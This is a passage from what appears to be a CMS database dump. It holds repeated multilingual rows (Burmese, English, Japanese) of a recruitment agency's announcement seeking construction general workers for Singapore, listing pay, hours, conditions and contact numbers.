ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 28, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင်General Workerဖြင့်အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း(၅)ဦးအမြန်အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက်(၈)နာရီမှ ညနေ(၅)နာရီထိ အလုပ်လုပ်ချိန်(၈)နာရီ</li><li>တစ်နေ့လုပ်အားခ$$20&nbsp;</li><li>ညနေ(၅)နာရီနောက်ပိုင်းအချိန်ပိုလုပ်ပါက 1.5 Timeအချိန်ပိုကြေးပေးပါမည်</li><li>အစားအသောက်မိမိဘာသာစီစဉ်စားသောက်ရပါမည်</li><li>နေထိုင်စရာအဆောင်ခပေးစရာမလိုပါ</li><li>ရုံးမှကားဖြင့်အကြိုအပိုရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီးသွတ်လက်ဖြက်လပ်သော လူငယ်လူရွယ်များ(၂၀နှစ်မှ၃၅နှစ်)အတွင်း</li><li>ပညာအရည်အချင်းရှိရန်မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လိုနည်းနည်းပြောတတ်ပြီး နည်းနည်းနားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 5, 37, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင်General Workerဖြင့်အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း(၅)ဦးအမြန်အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက်(၈)နာရီမှ ညနေ(၅)နာရီထိ အလုပ်လုပ်ချိန်(၈)နာရီ</li><li>တစ်နေ့လုပ်အားခ$$20&nbsp;</li><li>ညနေ(၅)နာရီနောက်ပိုင်းအချိန်ပိုလုပ်ပါက 1.5 Timeအချိန်ပိုကြေးပေးပါမည်</li><li>အစားအသောက်မိမိဘာသာစီစဉ်စားသောက်ရပါမည်</li><li>နေထိုင်စရာအဆောင်ခပေးစရာမလိုပါ</li><li>ရုံးမှကားဖြင့်အကြိုအပိုရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီးသွတ်လက်ဖြက်လပ်သော လူငယ်လူရွယ်များ(၂၀နှစ်မှ၃၅နှစ်)အတွင်း</li><li>ပညာအရည်အချင်းရှိရန်မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လိုနည်းနည်းပြောတတ်ပြီး နည်းနည်းနားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 5, 42, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင် General Workerဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း (၅) ဦး အမြန် အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက်(၈)နာရီမှ ညနေ(၅)နာရီထိ အလုပ်လုပ်ချိန် (၈) နာရီ</li><li>တစ်နေ့လုပ်အားခ $$20&nbsp;</li><li>ညနေ (၅)နာရီနောက်ပိုင်း အချိန်ပို လုပ်ပါက 1.5 Time အချိန်ပိုကြေး ပေးပါမည်</li><li>အစားအသောက် မိမိဘာသာ စီစဉ် စားသောက်ရပါမည်</li><li>နေထိုင်စရာ အဆောင်ခ ပေးစရာမလိုပါ</li><li>ရုံးမှကားဖြင့် အကြိုအပို့ ရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီး သွတ်လက်ဖြက်လပ်သော လူငယ်လူရွယ်များ (၂၀နှစ်မှ ၃၅နှစ်) အတွင်း</li><li>ပညာအရည်အချင်းရှိရန် မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လို နည်းနည်းပြောတတ်ပြီး နည်းနည်း နားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 5, 76, 'en', 0, '<p>စင်္ကာပူနိူင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင် General Workerဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသောဝန်ထမ်း (၅) ဦး အမြန် အလိုရှိပါတယ်</p><h3><br>အလုပ်ချိန်-<br>&nbsp;</h3><ul><li>မနက်(၈)နာရီမှ ညနေ(၅)နာရီထိ အလုပ်လုပ်ချိန် (၈) နာရီ</li><li>တစ်နေ့လုပ်အားခ $$20&nbsp;</li><li>ညနေ (၅)နာရီနောက်ပိုင်း အချိန်ပို လုပ်ပါက 1.5 Time အချိန်ပိုကြေး ပေးပါမည်</li><li>အစားအသောက် မိမိဘာသာ စီစဉ် စားသောက်ရပါမည်</li><li>နေထိုင်စရာ အဆောင်ခ ပေးစရာမလိုပါ</li><li>ရုံးမှကားဖြင့် အကြိုအပို့ ရှိပါမည်</li><li>ကျန်းမာရေးကောင်းပြီး သွတ်လက်ဖြက်လပ်သော လူငယ်လူရွယ်များ (၂၀နှစ်မှ ၃၅နှစ်) အတွင်း</li><li>ပညာအရည်အချင်းရှိရန် မလိုပါ</li><li>ထမင်းစားရေသောက် အင်္ဂလိပ်လို နည်းနည်းပြောတတ်ပြီး နည်းနည်း နားလည်ရင်လဲရပြီ</li></ul><h3><br>ဆက်သွယ်ရန်</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 5, 77, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><p><br>Work Hours-<br>&nbsp;<br>&nbsp;</p><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 78, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 132, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 132, 'ja', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 135, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 135, 'ja', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 135, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 212, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 212, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><h3><br>勤務時間 -</h3><ul><li>午前8時から午後5時まで（1日8時間）</li><li>給与: 1日あたり20シンガポールドル</li><li>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.</li><li>食事は自己管理で行っていただく必要があります。</li><li>寮の生活費は支払う必要はありません。</li><li>オフィス/会社は交通手段としてフェリーをサポートしています。</li><li>年齢が20歳から35歳の健康でアクティブな方々を募集しています。</li><li>学歴の要件はありません。</li><li>英語を少し話し、理解できるだけで十分です。</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 212, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 315, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 315, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><h3><br>勤務時間 -</h3><ul><li>午前8時から午後5時まで（1日8時間）</li><li>給与: 1日あたり20シンガポールドル</li><li>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.</li><li>食事は自己管理で行っていただく必要があります。</li><li>寮の生活費は支払う必要はありません。</li><li>オフィス/会社は交通手段としてフェリーをサポートしています。</li><li>年齢が20歳から35歳の健康でアクティブな方々を募集しています。</li><li>学歴の要件はありません。</li><li>英語を少し話し、理解できるだけで十分です。</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 315, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 318, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 318, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><h3><br>勤務時間 -</h3><ul><li>午前8時から午後5時まで（1日8時間）</li><li>給与: 1日あたり20シンガポールドル</li><li>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.</li><li>食事は自己管理で行っていただく必要があります。</li><li>寮の生活費は支払う必要はありません。</li><li>オフィス/会社は交通手段としてフェリーをサポートしています。</li><li>年齢が20歳から35歳の健康でアクティブな方々を募集しています。</li><li>学歴の要件はありません。</li><li>英語を少し話し、理解できるだけで十分です。</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 318, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 319, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 319, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><h3><br>勤務時間 -</h3><ul><li>午前8時から午後5時まで（1日8時間）</li><li>給与: 1日あたり20シンガポールドル</li><li>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.</li><li>食事は自己管理で行っていただく必要があります。</li><li>寮の生活費は支払う必要はありません。</li><li>オフィス/会社は交通手段としてフェリーをサポートしています。</li><li>年齢が20歳から35歳の健康でアクティブな方々を募集しています。</li><li>学歴の要件はありません。</li><li>英語を少し話し、理解できるだけで十分です。</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 319, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 322, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 322, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 323, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 323, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 324, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 324, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><p><br>勤務時間 -<br>午前8時から午後5時まで（1日8時間）<br>給与: 1日あたり20シンガポールドル<br>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.<br>食事は自己管理で行っていただく必要があります。<br>寮の生活費は支払う必要はありません。<br>オフィス/会社は交通手段としてフェリーをサポートしています。<br>年齢が20歳から35歳の健康でアクティブな方々を募集しています。<br>学歴の要件はありません。<br>英語を少し話し、理解できるだけで十分です。</p><p>Contact Us</p><p>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 324, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 325, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 325, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><p><br>勤務時間 -<br>午前8時から午後5時まで（1日8時間）<br>給与: 1日あたり20シンガポールドル<br>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.<br>食事は自己管理で行っていただく必要があります。<br>寮の生活費は支払う必要はありません。<br>オフィス/会社は交通手段としてフェリーをサポートしています。<br>年齢が20歳から35歳の健康でアクティブな方々を募集しています。<br>学歴の要件はありません。<br>英語を少し話し、理解できるだけで十分です。</p><p>Contact Us</p><p>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 325, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
